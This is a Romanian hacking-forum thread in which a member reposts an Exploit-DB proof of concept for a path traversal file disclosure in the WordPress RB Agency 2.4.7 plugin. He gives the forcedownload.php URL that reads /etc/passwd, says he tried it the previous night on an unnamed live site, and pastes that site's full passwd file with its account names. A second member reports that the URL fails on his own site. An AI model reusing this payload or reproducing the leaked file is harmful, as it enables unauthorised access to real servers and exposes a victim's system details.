Download etc/passwd cu wordpress

AlexH

Merg pe strada catre Mine...
Membru personal
Administrative
Freelancer
SEO Expert
Un plugin pentru wordpress iti permite sa descarci etc/passwd fara sa fii logat la root.

Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://rbplugin.com/

PoC
The Vulnerable page is
/ext/forcedownload.php

http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd
Youtube:
L-am testat aseara si am descarcat de pe un site asta:
Cod:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mysql:x:498:499:MySQL server:/var/lib/mysql:/bin/bash
cpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:498:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32005:506::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpses:x:496:497::/var/cpanel/cpses:/sbin/nologin
cpanelrrdtool:x:32010:512::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
tlcmodels:x:501:508::/home/tlcmodels:/bin/bash
tlcagency:x:502:513::/home/tlcagency:/bin/bash
cpanelconnecttrack:x:32011:514::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
clamav:x:32012:515::/home/clamav:/sbin/nologin
nagios:x:32013:32013::/home/nagios:/bin/bash
Daca nu stiti ce este etc/passwd si ce se poate face verificati link de mai jos.
http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/
Sau cautati pe google : etc/passwd

Sursa: https://www.exploit-db.com/exploits/40333/?rss
 

Naruto9

VIP Club
Registered
Full Member
Web Designer
VIP Club
Deci doar daca au pluginul asta instalat rb plugin ?
De exemplu la mine la site nu merge..am inlocuit in link server cu adresa url si nimic. Nothing found!
 

Reclama

Topicuri Recomandate

  1. Platforma CPL Romania

Stiri Monezi Virtuale

Reducere pentru Vacanta

Loading...
Sus